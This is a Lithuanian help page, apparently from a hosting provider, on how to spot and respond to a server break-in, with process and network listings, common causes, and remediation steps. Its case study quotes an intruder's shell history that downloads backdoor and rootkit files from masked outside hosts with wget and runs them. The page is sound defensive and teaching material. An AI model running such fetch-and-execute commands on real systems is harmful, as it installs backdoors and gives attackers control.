Paieška


print PDF
Į serverį buvo įsibrauta

Tai gali įvykti ir su jūsų serveriu.

Kaip pamatyti, kad į serverį buvo įsibrauta?

Labai daug informacijos gali suteikti MRTG grafikai:





Serverio žurnaluose (logs) mes matome:

root 3632 0.0 1.0 2368 1320 pts/0 S 10:51 0:00 -bash
root 6310 0.0 0.1 476 248 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400
[...]

root 6360 0.0 0.1 476 244 pts/0 S 11:27 0:00 ./ipv6fuck 213.186.34.196 192.88.99.1 2002:d5ba:22c4:: 2001:6b8:0:400


Panašu, kad įsilaužėlis galėjo leisti tokias programas kaip „root“. Tai reiškia, kad į serverį buvo įsilaužta ir jis turi būti įdiegtas iš naujo.

# netstat -tanpu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:9875 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:1052 0.0.0.0:* 28823/xc
udp 0 0 0.0.0.0:6770 0.0.0.0:* 28823/xc
# ps auxw | grep 28823
root 7117 0.0 0.5 1796 748 pts/1 S 11:38 0:00 grep 28823


Jeigu yra programų, kurios turi savo PID, tačiau nėra matomos ps, tai reiškia, kad ps buvo pakeistas nulaužtu ps, kuris paslepia visus procesus parodančius įsilaužimą. Tuomet:

# halt

Broadcast message from root (pts/1) Thu Nov 20 11:39:22 2003...

The system is going down for system halt NOW !!


Taip, mes tuojau pat sustabdome serverį.

Į serverį gali būti įsibrauta dalinai arba įsibrauta pilnai.

Kodėl buvo įsilaužta į serverį?

Gali būti daugybė priežasčių:
Jūs naudojate „telnet“. Tačiau jungiantis per „telnet“ nei prisijungimo vardas, nei slaptažodis nėra koduojami, todėl bet kada gali būti „pavogti“. Privalote naudoti SSH. Daugiau apie SSH skaitykite čia: SshSkirtajameServeryje.

Prisijungimui prie FTP naudojate „root“ prisijungimo duomenis. Tuomet turėtumėte naudoti SFTP.

Pop3/imap naudojate „root“ slaptažodį. Tuomet naudokite APOP arba POP3S/IMAPS. Daugiau apie SSH skaitykite čia: SmtpPop3Imap.

Visuomet atnaujinkite programinę įrangą LeidimaiNaujinimai tam, kad įsibrovėliai negalėtų naudoti žinomų saugos spragų (OVH tinkle kiekvieną dieną yra atliekama apie 250 skanavimų norint atrasti naujų saugumo spragų).

Ką daryti?

Jeigu buvo įsibrauta į serverį vienintelis efektyviausias kovos būdas: perinstaliuoti jį.

Galite atidaryti gedimo kvitą ir perjungti serverį į „rescue“ režimą. Būtinai nurodykite priežastį ir įsipareigojimą pašalinti problemą. Mes atidžiai stebėsime, ar, prieš atkurdami normalų serverio veikimą, pašalinsite įsilaužimo pasekmes ir imsitės visų priemonių, kad tai nepasikartotų.

Nulaužimo pavyzdžiai

1. CGI skripto klaida

Požymiai

g00dies.tgz failas buvo įkeltas į /tmp kartu su kitais failas: x, k, ir t.t. ...
x yra atgalinio įėjimo (backdoor) programa, kurią paleidus suteikiama prieiga prie serverio.

Kataloge /tmp radome nobody vartotojo bash.history, kurio turinys:
cd /tmp
wget www.#######.com/x
chmod +x x
./s
./x
./x
./x
./x./x
./x
./x
./x
./x
wget www.#######.com/k
chmod +x k
./k -d;
/tmp/x
./x
./x
./x
./x
./x
./x
./
cd /tmp
mkdir .,
cd .,
wget ######.go.ro/vampix
tar zxvf vampix
cd esc
./mingetty
./mingetty
./mingetty
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
cd /tmp
wget ######.go.ro/smth
chmod +x smth
./smth
cd /tmp
wget ######.go.ro/g00dies.tgz
tar zxvf g00dies.tgz
cd goodies
mv stealth /tmp
/tmp/smth
/tmp/stealth


Komentarai

Čia mes matome, kad šios komandos įrašytos vykdyti apache naudojamo vartotojo „nobody“. Panašu, kad įsibrovėlis pasinaudojo CGI skripto saugumo spraga.

Sprendimas

- Sustabdyti (kill) visas įtartinas užduotis (procesus).
Panašu, kad įsibrovėlis šiuo atveju neturi „root“ teisių (jeigu branduolys nėra senesnis nei <2.4.24);
Tačiau, vis vien reikia atlikti kai kurias elementarias operacijas/patikrinimus:

  • Pakeisti visus slaptažodžius: root, user, mysql, mail ir pan. ... (matome, kad įsibrovėlis buvo paleidęs mingetty)
  • Surasti visus failus, kurie buvo modifikuoti po įsibrovimo: find /rep -cmin -60 (randamos visos bylos, kurios buvo modifikuotos pastarąją valandą).

- Paskaitykite Apache žurnalus (logs) tuo metu, kai įvyko įsibrovimas.